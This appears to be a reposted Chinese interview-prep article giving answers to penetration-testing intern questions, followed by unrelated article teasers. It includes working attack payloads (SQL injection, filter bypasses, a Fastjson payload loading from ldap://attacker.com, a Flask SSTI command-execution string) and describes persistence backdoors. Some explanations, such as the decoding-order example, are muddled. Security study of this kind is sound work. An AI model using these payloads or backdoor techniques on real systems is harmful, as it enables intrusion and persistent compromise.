2025年滲透測試面試題總結-字某跳動-滲透測試實習生(題目+回答)

?網絡安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。

字某跳動-滲透測試實習生

滲透流程信息收集如何處理子域名爆破中的泛解析問題繞過CDN尋找真實IPPHPINFO頁面關注信息有沒有了解權限維持舉例一個漏洞詳細描述輸出到href的xss如何防御samesite防御CSRF的原理CSRF的防御json格式的CSRF如何防御瀏覽器解析順序和解碼順序過濾逗號的sql注入如何繞過過濾limit后的逗號如何繞過fastjson相關漏洞Python相關的漏洞回答(flask、SSTI原理)

1. 滲透流程

  1. 情報收集
    • 被動收集:Whois查詢、證書透明度日志(CT Logs)、GitHub代碼泄露。
    • 主動探測:子域名爆破(使用Amass/Sublist3r)、端口掃描(Masscan/Nmap)。
  2. 漏洞分析
    • 自動化掃描:AWVS/Nessus檢測常見漏洞(SQLi/XSS)。
    • 手動驗證:驗證誤報漏洞,如邏輯漏洞(越權/支付繞過)。
  3. 攻擊利用
    • 漏洞利用:通過Metasploit或定制化EXP攻擊目標(如ThinkPHP RCE)。
    • 權限提升:利用內核漏洞(DirtyCow)或SUID提權(find / -perm -4000)。
  4. 權限維持
    • 植入WebShell:加密后門(如蟻劍AES加密Shell)。
    • 系統后門:Windows注冊表后門、Linux cronjob定時任務。
  5. 橫向移動
    • 內網滲透:利用Responder抓取Net-NTLM哈希、Pass-The-Hash攻擊。
    • 數據竊取:通過DNS隧道或HTTP隱蔽信道外傳數據。

2. 子域名爆破中的泛解析問題處理

泛解析問題:所有未注冊子域名解析到同一IP(如*.example.com → 1.1.1.1)。
解決方案

  1. 響應指紋去重
    • 對比HTTP響應頭(Server/Cookie)和頁面哈希(如SimHash)。
    • 使用工具(FFUF/GoBuster)的-mc參數過濾重復狀態碼。
  2. 證書透明度日志
    • 通過crt.sh 查詢合法子域名證書記錄。
  3. 歷史DNS記錄
    • 使用SecurityTrails/ViewDNS查詢歷史A記錄。
  4. 字典智能生成
    • 基于目標業務關鍵詞生成子域(如dev/api/test)。

3. 繞過CDN尋找真實IP的六種方法

  1. DNS歷史記錄:通過DNSDB查詢目標域名歷史解析IP。
  2. 全球Ping測試:多地服務器(AWS EC2/DigitalOcean)執行pingcurl
  3. SSL證書關聯:Censys搜索相同證書的IP(parsed.names:example.com )。
  4. 敏感子域名:訪問mail.example.cominternal.example.com 可能直連真實IP。
  5. 郵件服務器追蹤:注冊目標服務觸發郵件,解析郵件頭Received字段。
  6. SSRF漏洞利用:通過目標服務器的SSRF漏洞獲取內網IP。

4. PHPINFO頁面關鍵信息審計

  1. 敏感配置項
    • allow_url_fopen=On:允許遠程文件包含(RFI)。
    • disable_functions:未禁用system/shell_exec等危險函數。
  2. 環境變量泄露
    • $_SERVER['DB_HOST']$_ENV['API_KEY']
  3. 臨時文件路徑
    • upload_tmp_dir可能暴露可寫目錄路徑。
  4. 擴展模塊風險
    • 啟用imap擴展可能導致CVE-2018-19518漏洞。

5. 權限維持技術詳解

  1. WebShell持久化
    • 隱藏文件名:.config.php + 修改文件時間戳(touch -t)。
  2. 系統級后門
    • Windows:注冊表鍵HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon添加啟動腳本。
    • Linux:/etc/rc.local 添加反向Shell命令。
  3. 內存駐留馬
    • Java內存馬:通過JSP注入Filter型內存Shell。
    • PHP內存馬:利用php-fpm未授權訪問注入。

6. 漏洞示例:SQL注入(以MySQL為例)

漏洞原理:未過濾用戶輸入的id參數直接拼接SQL語句。
利用Payload

/product?id=1' UNION SELECT 1,@@version,3-- -

攻擊效果:泄露數據庫版本、用戶權限等敏感信息。
修復方案

  • 使用預編譯語句(PDO/MyBatis)。
  • 輸入過濾:正則匹配/[^0-9]/限制為數字。

7. 輸出到href的XSS防御

漏洞示例:html

<a href="{{ user_input }}">Link</a> <!-- 用戶輸入為javascript:alert(1) -->

防御措施

  1. 協議白名單:僅允許http:///https:///mailto:
  2. URL編碼:對href值進行HTML實體編碼(如&&amp;)。
  3. CSP策略:設置Content-Security-Policy: default-src 'self'
  4. 框架安全:Vue/React自動轉義href中的動態內容。

8. SameSite防御CSRF原理

  • SameSite=Strict:完全禁止跨站請求攜帶Cookie(如銀行轉賬)。
  • SameSite=Lax:允許GET請求攜帶Cookie(適用于普通站點)。
  • SameSite=None:必須與Secure屬性共用(僅限HTTPS)。

9. CSRF防御方案

  1. Token驗證:表單中嵌入隨機Token(如Django的{% csrf_token %})。
  2. 雙重Cookie:請求頭中攜帶Cookie哈希值(如X-CSRF-Token: hash(cookie))。
  3. Referer檢查:驗證請求來源域名是否在白名單內。

10. JSON格式CSRF防御

  1. Content-Type校驗:拒絕非application/json請求。
  2. Token嵌入JSON:json
    { "data": "test", "csrf_token": "random_value" }
  3. 禁用CORS:設置Access-Control-Allow-Origin為特定域名。

11. 瀏覽器解析與解碼順序

  1. HTML解析優先
    • 解析標簽和實體(如&lt;<)。
  2. JavaScript執行
    • 處理Unicode轉義(如\u003c<)。
  3. URL解碼
    • 轉換%20為空格。
      示例:html
<a href="javascript:alert(1%26%23x29;)"></a> 

解碼順序:%26&&#x29;) → 最終執行alert(1)


12. 過濾逗號的SQL注入繞過

場景SELECT 1,2,3被攔截。
繞過方法

  1. JOIN語法:sql
    UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c
  2. LIMIT OFFSET:sql
    UNION SELECT 1 FROM users LIMIT 1 OFFSET 1 

13. 過濾LIMIT逗號的繞過

場景LIMIT 0,1被攔截。
繞過方法

  1. SQL Server語法:sql
    SELECT TOP 1 * FROM users 
  2. 變量賦值(MySQL):sql
    SELECT * FROM users LIMIT 1 OFFSET 0 

14. Fastjson漏洞解析

漏洞根源:反序列化時自動調用getter/setter方法(如CVE-2022-25845)。
利用條件:目標開啟autoType功能。
Payload示例:json

{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"ldap://attacker.com/exp" } 

修復方案:升級到Fastjson 1.2.83+,關閉autoType


15. Python漏洞:Flask SSTI

漏洞原理:未過濾用戶輸入直接渲染模板。
示例代碼:python

@app.route('/hello/<name>') def hello(name): return render_template_string(f'Hello {name}!') 

攻擊Payload:python

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

防御措施

  1. 使用安全模板引擎(Jinja2自動轉義)。
  2. 輸入過濾:禁止用戶輸入{{}}等特殊字符。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/71334.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/71334.shtml
英文地址,請注明出處:http://en.pswp.cn/web/71334.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Spring Boot 自動裝配深度解析與實踐指南

目錄 引言&#xff1a;自動裝配如何重塑Java應用開發&#xff1f; 一、自動裝配核心機制 1.1 自動裝配三大要素 1.2 自動裝配流程 二、自定義自動配置實現 2.1 創建自動配置類 2.2 配置屬性綁定 2.3 注冊自動配置 三、條件注解深度應用 3.1 常用條件注解對比 3.2 自定…

《算法筆記》9.6小節 數據結構專題(2)并查集 問題 C: How Many Tables

題目描述 Today is Ignatius birthday. He invites a lot of friends. Now its dinner time. Ignatius wants to know how many tables he needs at least. You have to notice that not all the friends know each other, and all the friends do not want to stay with stra…

CPU、SOC、MPU、MCU--詳細分析四者的區別

一、CPU 與SOC的區別 1.CPU 對于電腦&#xff0c;我們經常提到&#xff0c;處理器&#xff0c;內存&#xff0c;顯卡&#xff0c;硬盤四大部分可以組成一個基本的電腦。其中的處理器——Central Processing Unit&#xff08;中央處理器&#xff09;。CPU是一臺計算機的運算核…

Linux常用指令學習筆記

文章目錄 前言一、文件和目錄操作指令1. 文件操作2. 目錄操作 二、文件權限管理三、網絡相關指令四、系統管理指令五、文本編輯器基本操作 六、壓縮和解壓指令七、總結 前言 在當今的IT領域&#xff0c;Linux系統因其開源、穩定、安全等特性&#xff0c;廣泛應用于服務器、個人…

android studio通過 jni 調用第三方非標準 so庫

調用第三方的so方法&#xff0c;但這個so內的方法不是標準的jni方法。這就需要我們自己寫jni然后鏈接到第三方so庫&#xff0c;通過jni調用so庫中的方法。 1.簡述&#xff1a; 要先有第三方的so庫.so文件和編譯庫對應的.h頭文件 我們自己用 c/c 創建一個標準的so 庫,比如 my…

Spring(三)容器-注入

一 自動注入Autowire 代碼實現&#xff1a; package org.example.spring01.service;import org.springframework.stereotype.Service;Service public class UserService {}package org.example.spring01.controller;import lombok.Data; import lombok.ToString; import org.…

mac上最好的Python開發環境之Anaconda+Pycharm

為了運行修改 label-studio項目源碼&#xff0c;又不想在windows上運行&#xff0c;便在mac上開始安裝&#xff0c;開始使用poetry安裝&#xff0c;各種報錯&#xff0c;不是zip包解壓不了&#xff0c;就是numpy編譯報錯&#xff0c;pipy.org訪問出錯。最后使用anaconda成功啟動…

IDEA 接入 Deepseek

在本篇文章中&#xff0c;我們將詳細介紹如何在 JetBrains IDEA 中使用 Continue 插件接入 DeepSeek&#xff0c;讓你的 AI 編程助手更智能&#xff0c;提高開發效率。 一、前置準備 在開始之前&#xff0c;請確保你已經具備以下條件&#xff1a; 安裝了 JetBrains IDEA&…

前綴和矩陣

前綴和矩陣&#xff08;Prefix Sum Matrix&#xff09;是一種預處理技術&#xff0c;用于快速計算二維矩陣中任意子矩陣的元素和。其核心思想是通過提前計算并存儲每個位置左上角所有元素的和&#xff0c;將子矩陣和的查詢時間從暴力計算的 (O(mn)) 優化到 (O(1))。以下是構建前…

系統架構評估中的重要概念

(1)敏感點(Sensitivity Point) 和權衡點 (Tradeoff Point)。敏感點和權衡點是關鍵的架構 決策。敏感點是一個或多個構件(和/或構件之間的關系)的特性。研究敏感點可使設計人員 或分析員明確在搞清楚如何實現質量目標時應注意什么。權衡點是影響多個質量屬性的特性&#xff0c; …

SSL證書和HTTPS:全面解析它們的功能與重要性

每當我們在互聯網上輸入個人信息、進行在線交易時&#xff0c;背后是否有一個安全的保障&#xff1f;這時&#xff0c;SSL證書和HTTPS便扮演了至關重要的角色。本文將全面分析SSL證書和HTTPS的含義、功能、重要性以及它們在網絡安全中的作用。 一、SSL證書的定義與基本概念 S…

基于微信小程序的停車場管理系統的設計與實現

第1章 緒論 1.1 課題背景 隨著移動互聯形式的不斷發展&#xff0c;各行各業都在摸索移動互聯對本行業的改變&#xff0c;不斷的嘗試開發出適合于本行業或者本公司的APP。但是這樣一來用戶的手機上就需要安裝各種軟件&#xff0c;但是APP作為一個只為某個公司服務的一個軟件&a…

寶塔找不到php擴展swoole,服務器編譯安裝

1. 在php7.4中安裝swoole&#xff0c;但找不到這個擴展安裝 2. 服務器下載源碼解壓安裝 http://pecl.php.net/package/swoole 下載4.8.0版本 解壓到/www/server/php/74/下 3. 發現報錯問題&#xff1b; 更新一下依賴 yum update yum -y install gcc gcc-c autoconf libjpe…

大數據測試總結

總結測試要點&#xff1a; 參考產品文檔&#xff0c;技術文檔梳理以下內容 需求來源 業務方應用場景 數據源&#xff0c;數據格轉&#xff0c;數據產出&#xff0c;數據呈現方式&#xff08;數據消亡史&#xff09;&#xff0c;數據量級&#xff08;增量&#xff0c;全量&am…

React封裝通用Table組件,支持搜索(多條件)、篩選、自動序號、數據量統計等功能。未采用二次封裝調整靈活,包含使用文檔

封裝通用組件 一、封裝思想二、react代碼三、css代碼四、實現效果五、使用文檔 BasicTableModal 表格模態框組件1.組件簡介2.功能特點3.使用方法基礎用法寬度控制示例帶篩選功能搜索功能示例自定義單元格渲染 4.API 說明PropsColumn 配置項Filter 配置項 5.注意事項 一、封裝思…

React 中 useState 的 基礎使用

概念&#xff1a;useState 是一個React Hook&#xff08;函數&#xff09;&#xff0c;它允許我們向組件添加狀態變量&#xff0c;從而影響組件的渲染結果。 本質&#xff1a;和普通JS變量不同的是&#xff0c;狀態變量一旦發生變化&#xff0c;組件的視圖UI也會跟著變化&…

Html5學習教程,從入門到精通,HTML `<div>` 和 `<span>` 標簽:語法知識點與案例代碼(12)

HTML <div> 和 <span> 標簽&#xff1a;語法知識點與案例代碼 一、語法知識點 1. <div> 標簽 定義: <div> 是一個塊級元素&#xff0c;用于將文檔內容劃分為獨立的、可樣式化的部分。它本身沒有特定的語義&#xff0c;主要用于布局和分組。特點: 塊…

Hbase偽分布安裝教程,詳細版

注意Hbase版本與Hadoop版本的兼容&#xff0c;還有與JDK版本的兼容 本次用到的Hbase為2.4.6版本&#xff0c;Hadoop為3.1.3版本&#xff0c;JDK為JDK8 打開下面的網址查看兼容問題 Apache HBase Reference Guidehttps://hbase.apache.org/book.html#configuration 點擊基礎先…

Python項目】基于Python的圖像去霧算法研究和系統實現

Python項目】基于Python的圖像去霧算法研究和系統實現 技術簡介&#xff1a;采用Python技術、MYSQL數據庫等實現。 系統簡介&#xff1a;圖像去霧系統主要是基于暗通道先驗和逆深度估計技術的去霧算法&#xff0c;系統功能模塊分為&#xff08;1&#xff09;圖像上傳模塊&…

Stable Diffusion Prompt編寫規范詳解

Stable Diffusion Prompt編寫規范詳解 一、語法結構規范 &#xff08;一&#xff09;基礎模板框架 [質量強化] [主體特征] [環境氛圍] [風格控制] [鏡頭參數]質量強化&#xff1a;best quality, ultra detailed, 8k resolution?主體特征&#xff1a;(1girl:1.3), long …